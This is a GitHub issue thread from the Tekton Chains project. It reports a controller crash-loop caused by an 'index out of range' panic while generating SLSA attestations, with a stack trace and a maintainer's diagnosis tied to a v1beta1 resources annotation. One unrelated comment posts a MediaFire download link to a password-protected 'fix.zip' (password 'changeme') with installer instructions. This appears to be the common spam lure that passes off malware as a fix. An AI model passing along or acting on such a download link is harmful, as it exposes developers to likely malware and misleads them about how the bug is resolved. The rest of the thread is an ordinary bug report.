### ISSUE TITLE
Tekton Chains Controller is in "CrashLoopBackOff" due to "index out of range" error

### ISSUE THREAD

**Issue by jkhelil** [tektoncd/chains#1185]
Customer is seeing that the Tekton Chains Controller regularly crashes with the following being printed:
{"level":"info","ts":"2024-08-21T06:34:10.053Z","logger":"watcher","caller":"controller/controller.go:550","msg":"Reconcile succeeded","commit":"ebcd9c2","knative.dev/controller":"github.com.tektoncd.chains.pkg.reconciler.pipelinerun.Reconciler","knative.dev/kind":"tekton.dev.PipelineRun","knative.dev/traceid":"0947dd41-0d5b-4e97-afd8-c745db17b0bb","knative.dev/key":"rddl-build/policy-service-bxxkb","duration":0.000048124}
panic: runtime error: index out of range [3] with length 3

goroutine 199 [running]:
github.com/tektoncd/chains/pkg/chains/formats/slsa/v1/pipelinerun.buildConfig({0x3ca77f8?, 0xc0048a6840?}, 0xc0048febc0)
	/go/src/github.com/tektoncd/chains/pkg/chains/formats/slsa/v1/pipelinerun/pipelinerun.go:106 +0x1129
github.com/tektoncd/chains/pkg/chains/formats/slsa/v1/pipelinerun.GenerateAttestation({0x3ca77f8, 0xc0048a6840}, 0xc0048a6840?, 0xc0048f3ef0)
	/go/src/github.com/tektoncd/chains/pkg/chains/formats/slsa/v1/pipelinerun/pipelinerun.go:69 +0x19a
github.com/tektoncd/chains/pkg/chains/formats/slsa/v1.(*InTotoIte6).CreatePayload(0xc006031bb8, {0x3ca77f8, 0xc0048a6840}, {0x34f4a20?, 0xc0048a0a20?})
	/go/src/github.com/tektoncd/chains/pkg/chains/formats/slsa/v1/intotoite6.go:84 +0x525
github.com/tektoncd/chains/pkg/chains.(*ObjectSigner).Sign(0xc0001f1000, {0x3ca77f8, 0xc0048a6840}, {0x3cdcd10, 0xc0048a0a20})
	/go/src/github.com/tektoncd/chains/pkg/chains/signing.go:147 +0x5d7
github.com/tektoncd/chains/pkg/reconciler/pipelinerun.(*Reconciler).FinalizeKind(0xc0001f1040, {0x3ca77f8, 0xc0048a6840}, 0xc002a34b40)
	/go/src/github.com/tektoncd/chains/pkg/reconciler/pipelinerun/pipelinerun.go:109 +0x8cc
github.com/tektoncd/pipeline/pkg/client/injection/reconciler/pipeline/v1/pipelinerun.(*reconcilerImpl).Reconcile(0xc0005cfe00, {0x3ca77f8, 0xc0048a6780}, {0xc003b25e30, 0x24})
	/go/src/github.com/tektoncd/chains/vendor/github.com/tektoncd/pipeline/pkg/client/injection/reconciler/pipeline/v1/pipelinerun/reconciler.go:241 +0x3be
knative.dev/pkg/controller.(*Impl).processNextWorkItem(0xc000621320)
	/go/src/github.com/tektoncd/chains/vendor/knative.dev/pkg/controller/controller.go:542 +0x4cd
knative.dev/pkg/controller.(*Impl).RunContext.func3()
	/go/src/github.com/tektoncd/chains/vendor/knative.dev/pkg/controller/controller.go:491 +0x68
created by knative.dev/pkg/controller.(*Impl).RunContext
	/go/src/github.com/tektoncd/chains/vendor/knative.dev/pkg/controller/controller.go:489 +0x354

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jkhelil** [comment]
After checking the taskrun that causes the issue on the customer environement, it seems that it happens because
 tr.Status.Steps has more values than tr.Status.taskSpec.steps and this is because the taskrun was using the tekton annotation
 
tekton.dev/v1beta1Resources: '{"inputs":[{"name":"git-source","resourceSpec":{"type":"git","params":[
{"name":"url","value":"https://github.com/my_repo"}
,{"name":"revision","value":"main"}]}}]}'

**Comment by vdemeester** [comment]
cc @lcarva
